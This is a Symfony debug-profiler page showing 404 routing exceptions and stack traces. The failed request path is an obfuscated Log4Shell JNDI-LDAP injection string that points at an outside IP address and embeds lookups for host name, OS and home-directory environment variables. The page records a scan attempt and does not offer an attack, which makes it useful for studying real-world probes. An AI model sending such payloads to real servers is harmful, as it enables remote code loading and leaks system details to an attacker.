Exceptions
Exceptions 2
Symfony\Component\HttpKernel\Exception\ NotFoundHttpException
Show exception properties
Symfony\Component\HttpKernel\Exception\NotFoundHttpException {#278 -statusCode: 404 -headers: [] }
if ($referer = $request->headers->get('referer')) {$message .= \sprintf(' (from "%s")', $referer);}throw new NotFoundHttpException($message, $e);} catch (MethodNotAllowedException $e) {$message = \sprintf('No route found for "%s %s": Method Not Allowed (Allow: %s)', $request->getMethod(), $request->getUriForPath($request->getPathInfo()), implode(', ', $e->getAllowedMethods()));throw new MethodNotAllowedHttpException($e->getAllowedMethods(), $message, $e);}
in
vendor/symfony/event-dispatcher/Debug/WrappedListener.php
->
onKernelRequest
(line 115)
$this->priority ??= $dispatcher->getListenerPriority($eventName, $this->listener);$e = $this->stopwatch->start($this->name, 'event_listener');try {($this->optimizedListener ?? $this->listener)($event, $eventName, $dispatcher);} finally {if ($e->isStarted()) {$e->stop();}}
in
vendor/symfony/event-dispatcher/EventDispatcher.php
->
__invoke
(line 206)
foreach ($listeners as $listener) {if ($stoppable && $event->isPropagationStopped()) {break;}$listener($event, $eventName, $this);}}/*** Sorts the internal list of listeners for the given event by priority.
in
vendor/symfony/event-dispatcher/EventDispatcher.php
->
callListeners
(line 56)
} else {$listeners = $this->getListeners($eventName);}if ($listeners) {$this->callListeners($listeners, $eventName, $event);}return $event;}
in
vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php
->
dispatch
(line 126)
try {$this->beforeDispatch($eventName, $event);try {$e = $this->stopwatch->start($eventName, 'section');try {$this->dispatcher->dispatch($event, $eventName);} finally {if ($e->isStarted()) {$e->stop();}}
in
vendor/symfony/http-kernel/HttpKernel.php
->
dispatch
(line 159)
*/private function handleRaw(Request $request, int $type = self::MAIN_REQUEST): Response{// request$event = new RequestEvent($this, $request, $type);$this->dispatcher->dispatch($event, KernelEvents::REQUEST);if ($event->hasResponse()) {return $this->filterResponse($event->getResponse(), $request, $type);}
in
vendor/symfony/http-kernel/HttpKernel.php
->
handleRaw
(line 76)
$request->headers->set('X-Php-Ob-Level', (string) ob_get_level());$this->requestStack->push($request);$response = null;try {return $response = $this->handleRaw($request, $type);} catch (\Throwable $e) {if ($e instanceof \Error && !$this->handleAllThrowables) {throw $e;}
in
vendor/symfony/http-kernel/Kernel.php
->
handle
(line 193)
if (!$this->handlingHttpCache) {$this->resetServices = true;}try {return $this->getHttpKernel()->handle($request, $type, $catch);} finally {--$this->requestStackSize;}}
in
vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php
->
handle
(line 35)
) {}public function run(): int{$response = $this->kernel->handle($this->request);if (Kernel::VERSION_ID >= 60400) {$response->send(false);if (\function_exists('fastcgi_finish_request') && !$this->debug) {
in
vendor/autoload_runtime.php
->
run
(line 32)
$app = $app(...$args);exit($runtime->getRunner($app)->run());
<?phpuse App\Kernel;require_once dirname(__DIR__).'/vendor/autoload_runtime.php';return function (array $context) {return new Kernel($context['APP_ENV'], (bool) $context['APP_DEBUG']);};
Symfony\Component\Routing\Exception\ ResourceNotFoundException
if ($allowSchemes) {goto redirect_scheme;}}throw new ResourceNotFoundException(\sprintf('No routes found for "%s".', $pathinfo));}private function doMatch(string $pathinfo, array &$allow = [], array &$allowSchemes = []): array{$allow = $allowSchemes = [];
in
vendor/symfony/routing/Matcher/UrlMatcher.php
->
match
(line 90)
public function matchRequest(Request $request): array{$this->request = $request;$ret = $this->match($request->getPathInfo());$this->request = null;return $ret;}
in
vendor/symfony/routing/Router.php
->
matchRequest
(line 188)
if (!$matcher instanceof RequestMatcherInterface) {// fallback to the default UrlMatcherInterfacereturn $matcher->match($request->getPathInfo());}return $matcher->matchRequest($request);}/*** Gets the UrlMatcher or RequestMatcher instance associated with this Router.*/
in
vendor/symfony/http-kernel/EventListener/RouterListener.php
->
matchRequest
(line 101)
// add attributes based on the request (routing)try {// matching a request is more powerful than matching a URL path + context, so try that firstif ($this->matcher instanceof RequestMatcherInterface) {$parameters = $this->matcher->matchRequest($request);} else {$parameters = $this->matcher->match($request->getPathInfo());}$this->logger?->info('Matched route "{route}".', [
in
vendor/symfony/event-dispatcher/Debug/WrappedListener.php
->
onKernelRequest
(line 115)
$this->priority ??= $dispatcher->getListenerPriority($eventName, $this->listener);$e = $this->stopwatch->start($this->name, 'event_listener');try {($this->optimizedListener ?? $this->listener)($event, $eventName, $dispatcher);} finally {if ($e->isStarted()) {$e->stop();}}
in
vendor/symfony/event-dispatcher/EventDispatcher.php
->
__invoke
(line 206)
foreach ($listeners as $listener) {if ($stoppable && $event->isPropagationStopped()) {break;}$listener($event, $eventName, $this);}}/*** Sorts the internal list of listeners for the given event by priority.
in
vendor/symfony/event-dispatcher/EventDispatcher.php
->
callListeners
(line 56)
} else {$listeners = $this->getListeners($eventName);}if ($listeners) {$this->callListeners($listeners, $eventName, $event);}return $event;}
in
vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php
->
dispatch
(line 126)
try {$this->beforeDispatch($eventName, $event);try {$e = $this->stopwatch->start($eventName, 'section');try {$this->dispatcher->dispatch($event, $eventName);} finally {if ($e->isStarted()) {$e->stop();}}
in
vendor/symfony/http-kernel/HttpKernel.php
->
dispatch
(line 159)
*/private function handleRaw(Request $request, int $type = self::MAIN_REQUEST): Response{// request$event = new RequestEvent($this, $request, $type);$this->dispatcher->dispatch($event, KernelEvents::REQUEST);if ($event->hasResponse()) {return $this->filterResponse($event->getResponse(), $request, $type);}
in
vendor/symfony/http-kernel/HttpKernel.php
->
handleRaw
(line 76)
$request->headers->set('X-Php-Ob-Level', (string) ob_get_level());$this->requestStack->push($request);$response = null;try {return $response = $this->handleRaw($request, $type);} catch (\Throwable $e) {if ($e instanceof \Error && !$this->handleAllThrowables) {throw $e;}
in
vendor/symfony/http-kernel/Kernel.php
->
handle
(line 193)
if (!$this->handlingHttpCache) {$this->resetServices = true;}try {return $this->getHttpKernel()->handle($request, $type, $catch);} finally {--$this->requestStackSize;}}
in
vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php
->
handle
(line 35)
) {}public function run(): int{$response = $this->kernel->handle($this->request);if (Kernel::VERSION_ID >= 60400) {$response->send(false);if (\function_exists('fastcgi_finish_request') && !$this->debug) {
in
vendor/autoload_runtime.php
->
run
(line 32)
$app = $app(...$args);exit($runtime->getRunner($app)->run());
<?phpuse App\Kernel;require_once dirname(__DIR__).'/vendor/autoload_runtime.php';return function (array $context) {return new Kernel($context['APP_ENV'], (bool) $context['APP_DEBUG']);};
Logs
| Level | Channel | Message |
|---|---|---|
| INFO 17:06:58 | request |
Matched route "_profiler". {
"route": "_profiler",
"route_parameters": {
"_route": "_profiler",
"_controller": "web_profiler.controller.profiler::panelAction",
"token": "63e157"
},
"request_uri": "http://hackettss22test.aulaexperto.net:8085/_profiler/63e157?panel=exception&type=request",
"method": "GET"
}
|
Stack Traces 2
|
[2/2]
NotFoundHttpException
|
|---|
Symfony\Component\HttpKernel\Exception\NotFoundHttpException:
No route found for "GET http://bunge.aulaexperto.net:8085/_profiler/a5d113/search/$%7B$%7B:-j%7D$%7B:-n%7D$%7B:-d%7D$%7B:-i%7D:$%7B:-l%7D$%7B:-d%7D$%7B:-a%7D$%7B:-p%7D:/35.193.186.77:80/dn=gAAAAABqtpFnT5GZjQrnwsUGArPaDOtmo2gl7xrjbez_wHKqEyBgh_RABf3yxXP1vAScRaQr23TIO8WIEs2yUggxWV745wdD1A-bUAJI8iW7qC-i_HB_t1MHp3B9tw6CpsnYylKb6tEUnM7Fj0yG5ikYcqcEFAdkJRjP8OQ_9eNyLGaUlPuZwoJuaIdxhxh5GNRtKgfYeQZqwHH4W8L3_pWxNCJp6TxGmPTdc6tgrabNa2VRE2NtNCB7DlVx_Hh71LEQvLOsJoiNhD0TFPvmDxrDcAfalT6wDdAQp44syNV9C-LCiO-SmXbfCqeKb_CxNaJkUf0pKjkQbkF7LnxzcSP47s9-Xz7A-p264CG8XiflavFpr2MQHWRq7BRsxfe7JvyArqTjbY7w2g-eXnnB5zwPGDoZL8ALrfnpmcgEpwKAL1qkiWjkk5G24uKYfJIm_vmuebAPxvrt1xU55pUbFTp8jLMKznxZ2vGJ6M8yD5Or9VcgjCZ3Ku_9JQXHzYXhUWtpl4RKxwdg_Jrp6BGAupqnqJFD9pn0jdV81N1TTl3L_cICB-aoeROj0a9gkKs4sILcdWPP4qQpkeXj639GPWFg9lvF-Z9U3VxEkpfqTdwB3DzScP-KGmGifgJet2mMK7MwplnPYYLAQpfLdOqmUvm9LnVsdIvEBJR1nLWCXWb-nhWKphgsJKwAb7cZBa2Jfvs7lbPfqVBTQ143dVn9TGz20ePEhRk0fjL3Ca3R9FW7Uh5SRoV4nhtjKvU_dgpkRv2SgvNecnbwU4XldzZq6qfz3xUwjqencRWims2FsHk_5r_7KVd15Y63sXxS2YwQwSYo6YkyapBxrP6yBslPAWepObceR1wYbkhXI-xR4eJNrFTIXI6PKWuSERtSR1dxeM_cNEOweYhN_wl_mxL7_WYdAgFD8PZbs2Y67pMl41xMUcRBkUWNGRSfbf6kczC6PLXnOFbJeLBMjkBTr0mtvo7l2aHbLqwd2AT7DpttU3JcXKJYSaednJo_L4J6eS5pDDeRPWYdHj_8d-VgAegdmOAVH7Tw9BuMMl3ds3XiaNruMlh8SFCYKPcCv4ROg9rWN-5JRfSxirjM2-UDVlKnZqwPzuGkCdVCv3Pryh1f4CZcJER5XaatTiv4yhwBevfDaaiTjkHLwZ6-kXbZYRxf99Y9kJkFAxBGqOaRYiv_ZW9j0PG8Bguz1SE4T_4PFdefx7NBE2u0aZYT35BPv744zq3y_SDOztyceQEKNlzR3Z4MZMe4BIwL6V5OShoq8gJo6AHnIkBYsKEKgXESSUlvuqot89KfZUoe9WwKz4SN31Np47uayJ_dKQR6Jpwbh_QGi4CLq3eQWV2fXkj8r7duJcwzqLf1_pPNUgIle-otJJKP1wyiTjqybxUK3LxMBQCUINHrp8o752p3WYSHGADWWSRJHDXBwDGI4J0rd2fPiiNfgSIp4mySJdHHBpTe40wLn0AgjzrUiJlhBEwgg8ACQw0U4Y9S3AbnhAV_KUMfSJ96dNAv7UGoDTuwLCopGEFp6qk0129ko-3OBOy1rSgiJr2FKWv8nMYkBV7OQ3cwlzBurS7lhJ7gTzjs2e_GxZ7J0Hzz2hYAZUkvHxhb3yfjomIxhUfj3ejIVTpvY445oL7PFv8gPujuI6bkO8P7WqEJqoYP4e9UWx1ThItMdAvgR1yHE5piSyfqAnHzqkC0UluiZkVA6GKObErLg64K0vNR2kUH49sA0ba43rN-Xo3R0hlzLUSP7wg5QqeNKkTm0Mu1EaTmn2O2ycVpdFV89plwHLo0KPl5f-zUvhGYW8-xpbNOa3AxuLSeNwrRgf2dnuobgEc9WQGjXod5QoPeDcuyNhDXdUzYxSrghfcxkYq-EOUiUfrbr_8-g5S0uCjHatwBe-g6JLdRzi3w3D55xP9uHuMmZIluAbTTXy4UaWHt-8YcakV92rCASiWbDw6M08yPx7ntmWqZc0DhMsntY94YyrzPxffYtoDWY6mUUlBPCw8dMl4-_53EfWYdawdPC5J7TOY2WU8FjRnyaC1gbtMXvOycoJxnb7Tj0m8uaqlmgHgcNEvC8q3qX_DbYJ483FXQ9aRiD7sGT2_9XrTH8kYneeST_dYg_sUgz8kCGaZJ2Up4NBnDfu6aEu_XEOyZ71Wjat_Zz6IQWOfHq25FCdXO3mk3Hq38BAbE5i9W7iwCHJhzRI34tnbS0MvaiuqEyibwzhbSQPm7Dh1H4k2aM9u4AfPvGpBSoRwXBZoKWmj3UQqWZVnIb5E44ToS4Tst4aHTF6QYGyO6S50PA6Rd6zQqhRY5d_gxBSUrswAuxOAr8gHTWXULBATkYIaH9RlhT03RvY1xRDu2dJikh9isNklQIlfMdkGVXJPrFnP1xtRs4diZDS0uk0c0ahRGxVxm7jMNvlmMqL41Ws1pcZRQ7xYz9mV7CleqRpzSV08qHX5RY1JAlzp4n0j71dgJK-g0Ese0rp5n2fYhyaaZ-u1_Yc5UaVH4t61wC8Xr0y5ll1Fy4vQYH42rMtMPZDfuzjzEA_LeIe7a5GZJZE2rlc95OVd8L6XrfArTanR8EElEjzkGajps1UctzE96cpTNXgmiOqAuaiH0L5LDOEA=,cn='$%7BhostName%7D',ou='$%7Bjava:os%7D',ca1='$%7BENV:HOME:-Non%7D',ca2='$%7Blog4j:configParentLocation%7D',wca2='$%7BENV:HOMEPATH:-Non%7D'%7D/"
at vendor/symfony/http-kernel/EventListener/RouterListener.php:156
at Symfony\Component\HttpKernel\EventListener\RouterListener->onKernelRequest(object(RequestEvent), 'kernel.request', object(TraceableEventDispatcher))
(vendor/symfony/event-dispatcher/Debug/WrappedListener.php:115)
at Symfony\Component\EventDispatcher\Debug\WrappedListener->__invoke(object(RequestEvent), 'kernel.request', object(TraceableEventDispatcher))
(vendor/symfony/event-dispatcher/EventDispatcher.php:206)
at Symfony\Component\EventDispatcher\EventDispatcher->callListeners(array(object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener)), 'kernel.request', object(RequestEvent))
(vendor/symfony/event-dispatcher/EventDispatcher.php:56)
at Symfony\Component\EventDispatcher\EventDispatcher->dispatch(object(RequestEvent), 'kernel.request')
(vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php:126)
at Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher->dispatch(object(RequestEvent), 'kernel.request')
(vendor/symfony/http-kernel/HttpKernel.php:159)
at Symfony\Component\HttpKernel\HttpKernel->handleRaw(object(Request), 1)
(vendor/symfony/http-kernel/HttpKernel.php:76)
at Symfony\Component\HttpKernel\HttpKernel->handle(object(Request), 1, true)
(vendor/symfony/http-kernel/Kernel.php:193)
at Symfony\Component\HttpKernel\Kernel->handle(object(Request))
(vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php:35)
at Symfony\Component\Runtime\Runner\Symfony\HttpKernelRunner->run()
(vendor/autoload_runtime.php:32)
at require_once('/var/www/html/vendor/autoload_runtime.php')
(public/index.php:5)
|
|
[1/2]
ResourceNotFoundException
|
|---|
Symfony\Component\Routing\Exception\ResourceNotFoundException:
No routes found for "/_profiler/a5d113/search/$%7B$%7B:-j%7D$%7B:-n%7D$%7B:-d%7D$%7B:-i%7D:$%7B:-l%7D$%7B:-d%7D$%7B:-a%7D$%7B:-p%7D:/35.193.186.77:80/dn=gAAAAABqtpFnT5GZjQrnwsUGArPaDOtmo2gl7xrjbez_wHKqEyBgh_RABf3yxXP1vAScRaQr23TIO8WIEs2yUggxWV745wdD1A-bUAJI8iW7qC-i_HB_t1MHp3B9tw6CpsnYylKb6tEUnM7Fj0yG5ikYcqcEFAdkJRjP8OQ_9eNyLGaUlPuZwoJuaIdxhxh5GNRtKgfYeQZqwHH4W8L3_pWxNCJp6TxGmPTdc6tgrabNa2VRE2NtNCB7DlVx_Hh71LEQvLOsJoiNhD0TFPvmDxrDcAfalT6wDdAQp44syNV9C-LCiO-SmXbfCqeKb_CxNaJkUf0pKjkQbkF7LnxzcSP47s9-Xz7A-p264CG8XiflavFpr2MQHWRq7BRsxfe7JvyArqTjbY7w2g-eXnnB5zwPGDoZL8ALrfnpmcgEpwKAL1qkiWjkk5G24uKYfJIm_vmuebAPxvrt1xU55pUbFTp8jLMKznxZ2vGJ6M8yD5Or9VcgjCZ3Ku_9JQXHzYXhUWtpl4RKxwdg_Jrp6BGAupqnqJFD9pn0jdV81N1TTl3L_cICB-aoeROj0a9gkKs4sILcdWPP4qQpkeXj639GPWFg9lvF-Z9U3VxEkpfqTdwB3DzScP-KGmGifgJet2mMK7MwplnPYYLAQpfLdOqmUvm9LnVsdIvEBJR1nLWCXWb-nhWKphgsJKwAb7cZBa2Jfvs7lbPfqVBTQ143dVn9TGz20ePEhRk0fjL3Ca3R9FW7Uh5SRoV4nhtjKvU_dgpkRv2SgvNecnbwU4XldzZq6qfz3xUwjqencRWims2FsHk_5r_7KVd15Y63sXxS2YwQwSYo6YkyapBxrP6yBslPAWepObceR1wYbkhXI-xR4eJNrFTIXI6PKWuSERtSR1dxeM_cNEOweYhN_wl_mxL7_WYdAgFD8PZbs2Y67pMl41xMUcRBkUWNGRSfbf6kczC6PLXnOFbJeLBMjkBTr0mtvo7l2aHbLqwd2AT7DpttU3JcXKJYSaednJo_L4J6eS5pDDeRPWYdHj_8d-VgAegdmOAVH7Tw9BuMMl3ds3XiaNruMlh8SFCYKPcCv4ROg9rWN-5JRfSxirjM2-UDVlKnZqwPzuGkCdVCv3Pryh1f4CZcJER5XaatTiv4yhwBevfDaaiTjkHLwZ6-kXbZYRxf99Y9kJkFAxBGqOaRYiv_ZW9j0PG8Bguz1SE4T_4PFdefx7NBE2u0aZYT35BPv744zq3y_SDOztyceQEKNlzR3Z4MZMe4BIwL6V5OShoq8gJo6AHnIkBYsKEKgXESSUlvuqot89KfZUoe9WwKz4SN31Np47uayJ_dKQR6Jpwbh_QGi4CLq3eQWV2fXkj8r7duJcwzqLf1_pPNUgIle-otJJKP1wyiTjqybxUK3LxMBQCUINHrp8o752p3WYSHGADWWSRJHDXBwDGI4J0rd2fPiiNfgSIp4mySJdHHBpTe40wLn0AgjzrUiJlhBEwgg8ACQw0U4Y9S3AbnhAV_KUMfSJ96dNAv7UGoDTuwLCopGEFp6qk0129ko-3OBOy1rSgiJr2FKWv8nMYkBV7OQ3cwlzBurS7lhJ7gTzjs2e_GxZ7J0Hzz2hYAZUkvHxhb3yfjomIxhUfj3ejIVTpvY445oL7PFv8gPujuI6bkO8P7WqEJqoYP4e9UWx1ThItMdAvgR1yHE5piSyfqAnHzqkC0UluiZkVA6GKObErLg64K0vNR2kUH49sA0ba43rN-Xo3R0hlzLUSP7wg5QqeNKkTm0Mu1EaTmn2O2ycVpdFV89plwHLo0KPl5f-zUvhGYW8-xpbNOa3AxuLSeNwrRgf2dnuobgEc9WQGjXod5QoPeDcuyNhDXdUzYxSrghfcxkYq-EOUiUfrbr_8-g5S0uCjHatwBe-g6JLdRzi3w3D55xP9uHuMmZIluAbTTXy4UaWHt-8YcakV92rCASiWbDw6M08yPx7ntmWqZc0DhMsntY94YyrzPxffYtoDWY6mUUlBPCw8dMl4-_53EfWYdawdPC5J7TOY2WU8FjRnyaC1gbtMXvOycoJxnb7Tj0m8uaqlmgHgcNEvC8q3qX_DbYJ483FXQ9aRiD7sGT2_9XrTH8kYneeST_dYg_sUgz8kCGaZJ2Up4NBnDfu6aEu_XEOyZ71Wjat_Zz6IQWOfHq25FCdXO3mk3Hq38BAbE5i9W7iwCHJhzRI34tnbS0MvaiuqEyibwzhbSQPm7Dh1H4k2aM9u4AfPvGpBSoRwXBZoKWmj3UQqWZVnIb5E44ToS4Tst4aHTF6QYGyO6S50PA6Rd6zQqhRY5d_gxBSUrswAuxOAr8gHTWXULBATkYIaH9RlhT03RvY1xRDu2dJikh9isNklQIlfMdkGVXJPrFnP1xtRs4diZDS0uk0c0ahRGxVxm7jMNvlmMqL41Ws1pcZRQ7xYz9mV7CleqRpzSV08qHX5RY1JAlzp4n0j71dgJK-g0Ese0rp5n2fYhyaaZ-u1_Yc5UaVH4t61wC8Xr0y5ll1Fy4vQYH42rMtMPZDfuzjzEA_LeIe7a5GZJZE2rlc95OVd8L6XrfArTanR8EElEjzkGajps1UctzE96cpTNXgmiOqAuaiH0L5LDOEA=,cn='$%7BhostName%7D',ou='$%7Bjava:os%7D',ca1='$%7BENV:HOME:-Non%7D',ca2='$%7Blog4j:configParentLocation%7D',wca2='$%7BENV:HOMEPATH:-Non%7D'%7D".
at vendor/symfony/routing/Matcher/Dumper/CompiledUrlMatcherTrait.php:70
at Symfony\Component\Routing\Matcher\CompiledUrlMatcher->match('/_profiler/a5d113/search/$%7B$%7B:-j%7D$%7B:-n%7D$%7B:-d%7D$%7B:-i%7D:$%7B:-l%7D$%7B:-d%7D$%7B:-a%7D$%7B:-p%7D:/35.193.186.77:80/dn=gAAAAABqtpFnT5GZjQrnwsUGArPaDOtmo2gl7xrjbez_wHKqEyBgh_RABf3yxXP1vAScRaQr23TIO8WIEs2yUggxWV745wdD1A-bUAJI8iW7qC-i_HB_t1MHp3B9tw6CpsnYylKb6tEUnM7Fj0yG5ikYcqcEFAdkJRjP8OQ_9eNyLGaUlPuZwoJuaIdxhxh5GNRtKgfYeQZqwHH4W8L3_pWxNCJp6TxGmPTdc6tgrabNa2VRE2NtNCB7DlVx_Hh71LEQvLOsJoiNhD0TFPvmDxrDcAfalT6wDdAQp44syNV9C-LCiO-SmXbfCqeKb_CxNaJkUf0pKjkQbkF7LnxzcSP47s9-Xz7A-p264CG8XiflavFpr2MQHWRq7BRsxfe7JvyArqTjbY7w2g-eXnnB5zwPGDoZL8ALrfnpmcgEpwKAL1qkiWjkk5G24uKYfJIm_vmuebAPxvrt1xU55pUbFTp8jLMKznxZ2vGJ6M8yD5Or9VcgjCZ3Ku_9JQXHzYXhUWtpl4RKxwdg_Jrp6BGAupqnqJFD9pn0jdV81N1TTl3L_cICB-aoeROj0a9gkKs4sILcdWPP4qQpkeXj639GPWFg9lvF-Z9U3VxEkpfqTdwB3DzScP-KGmGifgJet2mMK7MwplnPYYLAQpfLdOqmUvm9LnVsdIvEBJR1nLWCXWb-nhWKphgsJKwAb7cZBa2Jfvs7lbPfqVBTQ143dVn9TGz20ePEhRk0fjL3Ca3R9FW7Uh5SRoV4nhtjKvU_dgpkRv2SgvNecnbwU4XldzZq6qfz3xUwjqencRWims2FsHk_5r_7KVd15Y63sXxS2YwQwSYo6YkyapBxrP6yBslPAWepObceR1wYbkhXI-xR4eJNrFTIXI6PKWuSERtSR1dxeM_cNEOweYhN_wl_mxL7_WYdAgFD8PZbs2Y67pMl41xMUcRBkUWNGRSfbf6kczC6PLXnOFbJeLBMjkBTr0mtvo7l2aHbLqwd2AT7DpttU3JcXKJYSaednJo_L4J6eS5pDDeRPWYdHj_8d-VgAegdmOAVH7Tw9BuMMl3ds3XiaNruMlh8SFCYKPcCv4ROg9rWN-5JRfSxirjM2-UDVlKnZqwPzuGkCdVCv3Pryh1f4CZcJER5XaatTiv4yhwBevfDaaiTjkHLwZ6-kXbZYRxf99Y9kJkFAxBGqOaRYiv_ZW9j0PG8Bguz1SE4T_4PFdefx7NBE2u0aZYT35BPv744zq3y_SDOztyceQEKNlzR3Z4MZMe4BIwL6V5OShoq8gJo6AHnIkBYsKEKgXESSUlvuqot89KfZUoe9WwKz4SN31Np47uayJ_dKQR6Jpwbh_QGi4CLq3eQWV2fXkj8r7duJcwzqLf1_pPNUgIle-otJJKP1wyiTjqybxUK3LxMBQCUINHrp8o752p3WYSHGADWWSRJHDXBwDGI4J0rd2fPiiNfgSIp4mySJdHHBpTe40wLn0AgjzrUiJlhBEwgg8ACQw0U4Y9S3AbnhAV_KUMfSJ96dNAv7UGoDTuwLCopGEFp6qk0129ko-3OBOy1rSgiJr2FKWv8nMYkBV7OQ3cwlzBurS7lhJ7gTzjs2e_GxZ7J0Hzz2hYAZUkvHxhb3yfjomIxhUfj3ejIVTpvY445oL7PFv8gPujuI6bkO8P7WqEJqoYP4e9UWx1ThItMdAvgR1yHE5piSyfqAnHzqkC0UluiZkVA6GKObErLg64K0vNR2kUH49sA0ba43rN-Xo3R0hlzLUSP7wg5QqeNKkTm0Mu1EaTmn2O2ycVpdFV89plwHLo0KPl5f-zUvhGYW8-xpbNOa3AxuLSeNwrRgf2dnuobgEc9WQGjXod5QoPeDcuyNhDXdUzYxSrghfcxkYq-EOUiUfrbr_8-g5S0uCjHatwBe-g6JLdRzi3w3D55xP9uHuMmZIluAbTTXy4UaWHt-8YcakV92rCASiWbDw6M08yPx7ntmWqZc0DhMsntY94YyrzPxffYtoDWY6mUUlBPCw8dMl4-_53EfWYdawdPC5J7TOY2WU8FjRnyaC1gbtMXvOycoJxnb7Tj0m8uaqlmgHgcNEvC8q3qX_DbYJ483FXQ9aRiD7sGT2_9XrTH8kYneeST_dYg_sUgz8kCGaZJ2Up4NBnDfu6aEu_XEOyZ71Wjat_Zz6IQWOfHq25FCdXO3mk3Hq38BAbE5i9W7iwCHJhzRI34tnbS0MvaiuqEyibwzhbSQPm7Dh1H4k2aM9u4AfPvGpBSoRwXBZoKWmj3UQqWZVnIb5E44ToS4Tst4aHTF6QYGyO6S50PA6Rd6zQqhRY5d_gxBSUrswAuxOAr8gHTWXULBATkYIaH9RlhT03RvY1xRDu2dJikh9isNklQIlfMdkGVXJPrFnP1xtRs4diZDS0uk0c0ahRGxVxm7jMNvlmMqL41Ws1pcZRQ7xYz9mV7CleqRpzSV08qHX5RY1JAlzp4n0j71dgJK-g0Ese0rp5n2fYhyaaZ-u1_Yc5UaVH4t61wC8Xr0y5ll1Fy4vQYH42rMtMPZDfuzjzEA_LeIe7a5GZJZE2rlc95OVd8L6XrfArTanR8EElEjzkGajps1UctzE96cpTNXgmiOqAuaiH0L5LDOEA=,cn=\'$%7BhostName%7D\',ou=\'$%7Bjava:os%7D\',ca1=\'$%7BENV:HOME:-Non%7D\',ca2=\'$%7Blog4j:configParentLocation%7D\',wca2=\'$%7BENV:HOMEPATH:-Non%7D\'%7D')
(vendor/symfony/routing/Matcher/UrlMatcher.php:90)
at Symfony\Component\Routing\Matcher\UrlMatcher->matchRequest(object(Request))
(vendor/symfony/routing/Router.php:188)
at Symfony\Component\Routing\Router->matchRequest(object(Request))
(vendor/symfony/http-kernel/EventListener/RouterListener.php:101)
at Symfony\Component\HttpKernel\EventListener\RouterListener->onKernelRequest(object(RequestEvent), 'kernel.request', object(TraceableEventDispatcher))
(vendor/symfony/event-dispatcher/Debug/WrappedListener.php:115)
at Symfony\Component\EventDispatcher\Debug\WrappedListener->__invoke(object(RequestEvent), 'kernel.request', object(TraceableEventDispatcher))
(vendor/symfony/event-dispatcher/EventDispatcher.php:206)
at Symfony\Component\EventDispatcher\EventDispatcher->callListeners(array(object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener)), 'kernel.request', object(RequestEvent))
(vendor/symfony/event-dispatcher/EventDispatcher.php:56)
at Symfony\Component\EventDispatcher\EventDispatcher->dispatch(object(RequestEvent), 'kernel.request')
(vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php:126)
at Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher->dispatch(object(RequestEvent), 'kernel.request')
(vendor/symfony/http-kernel/HttpKernel.php:159)
at Symfony\Component\HttpKernel\HttpKernel->handleRaw(object(Request), 1)
(vendor/symfony/http-kernel/HttpKernel.php:76)
at Symfony\Component\HttpKernel\HttpKernel->handle(object(Request), 1, true)
(vendor/symfony/http-kernel/Kernel.php:193)
at Symfony\Component\HttpKernel\Kernel->handle(object(Request))
(vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php:35)
at Symfony\Component\Runtime\Runner\Symfony\HttpKernelRunner->run()
(vendor/autoload_runtime.php:32)
at require_once('/var/www/html/vendor/autoload_runtime.php')
(public/index.php:5)
|